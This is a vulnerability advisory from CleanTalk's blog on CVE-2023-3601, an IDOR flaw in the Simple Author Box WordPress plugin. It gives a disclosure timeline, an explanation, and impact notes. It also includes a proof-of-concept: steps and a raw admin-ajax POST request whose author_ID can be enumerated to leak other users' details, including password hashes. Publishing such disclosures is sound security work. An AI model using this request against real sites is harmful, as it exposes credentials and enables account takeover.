Site icon CleanTalk's blog

CVE-2023-3601 – Simple Author Box < 2.52 - Contributor+ Arbitrary User Information Disclosure via IDOR (Thief of Creds)

We have discovered a severe security vulnerability in the Simple Author Box plugin (CVE-2023-3601), which puts your WordPress accounts at high risk of being compromised. This vulnerability allows attackers with Contributor-level access or higher to steal sensitive user information, including hashed passwords.

Main info:

CVECVE-2023-3601
PluginSimple Author Box
CriticalVery High
Publicly PublishedJuly 24, 2023
Last UpdatedJuly 24, 2023
ResearcherDmtirii Ignatyev
OWASP TOP-10A01:2021-Broken Access Control
PoCYes
ExploitWill be later
Reference https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3601
https://wpscan.com/vulnerability/c0cc513e-c306-4920-9afb-e33d95a7292f
Plugin Security Certification by CleanTalk

Timeline

July 5, 2023Plugin testing and vulnerability detection in the Simple Author Box plugin have been completed
July 6, 2023I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
July 16, 2023The author has eliminated the vulnerability and patched his plugin
July 24, 2023Registered CVE

Discovery of the Vulnerability

During a thorough security assessment, I identified a critical security flaw in the Simple Author Box plugin for WordPress (CVE-2023-3601) , specifically affecting versions up to and including 2.51. This vulnerability arises from an Insecure Direct Object Reference (IDOR) issue within the plugin’s code. The plugin fails to properly validate user input when handling requests (action=sab_get_author) to fetch information about specific users, leading to the unauthorized disclosure of sensitive user details.

Understanding Insecure Direct Object Reference (IDOR)

Insecure Direct Object Reference is a type of security vulnerability where an application exposes direct references to internal objects, such as files, database records, or resources, without proper access controls. Attackers can manipulate these exposed references (often through changing parameters or input values) to access unauthorized data or functionalities.

Exploiting the IDOR Vulnerability

In the context of the Simple Author Box vulnerability, the plugin does not adequately check whether a user is authorized to access specific user information before displaying it. By altering the user ID parameter in a request, an authenticated attacker with Contributor-level permissions or higher can access personal information of other users, including potentially sensitive data such as hashed passwords (CVE-2023-3601).

POC:

1. Create a new Post as a Contributor user.

2. Add the “Simple Author Box” block.

3. Intercept the request to `/wp-admin/admin-ajax.php` upon addition of the block. Change the `author_ID` parameter to an ID of a user of your choosing.

4. Inspect the response to see all of the information about that user, including the hashed password.

POC request:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: your_site_here
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://your_site_here/wordpress/wp-admin/post-new.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 50
Origin: http://your_site_here
Connection: close
Cookie: thc_time=1693728697; wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=forgen%7C1692348426%7CFaI19J1rkJx6EeKHpIVBTdyfmoDfF0Q1s0mnqWNHRUy%7C144c7182810741c5eae1d56f1a732319616b45d658a97cb2467966f1a9fa19de; wp-settings-1=libraryContent%3Dbrowse%26siteorigin_panels_setting_tab%3Dwelcome%26hidetb%3D0; wp-settings-time-1=1691260835; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=forgen%7C1692348426%7CFaI19J1rkJx6EeKHpIVBTdyfmoDfF0Q1s0mnqWNHRUy%7C65dd803dab6a195a6d2c2ff57c23361a622ab5130f1dd3da09ae9076153598ec
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

action=sab_get_author&author_ID={here_you_can_put_number_from_0_to_9999}&nonce=bc05e90fd7

Potential Risks and Real-World Impact

The IDOR vulnerability in the Simple Author Box plugin introduces severe risks to both website administrators and users. Some of the potential real-world impact includes:

  1. Unauthorized Data Exposure:
    Attackers can view and collect sensitive user information, leading to privacy violations and potential misuse of user data.
  2. Credential Compromise:
    Disclosure of hashed passwords can enable attackers to launch offline attacks, attempting to crack passwords and potentially gain unauthorized access to user accounts.
  3. Identity Impersonation:
    The leaked information could facilitate identity theft or social engineering attacks, compromising the integrity of user accounts and potentially affecting the reputation of the website.

Recommendations for Improved Security

To mitigate the risks associated with this vulnerability and enhance overall security, the following measures are strongly advised:

By addressing the IDOR vulnerability in the Simple Author Box plugin and following these security recommendations, website owners can significantly reduce the likelihood of security breaches and protect the privacy and integrity of their users’ data.

Use CleanTalk solutions to improve the security of your website

Dmitrii ignatyev

If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.


Check my website

CVE-2023-3601 – Simple Author Box < 2.52 - Contributor+ Arbitrary User Information Disclosure via IDOR (Thief of Creds)
Exit mobile version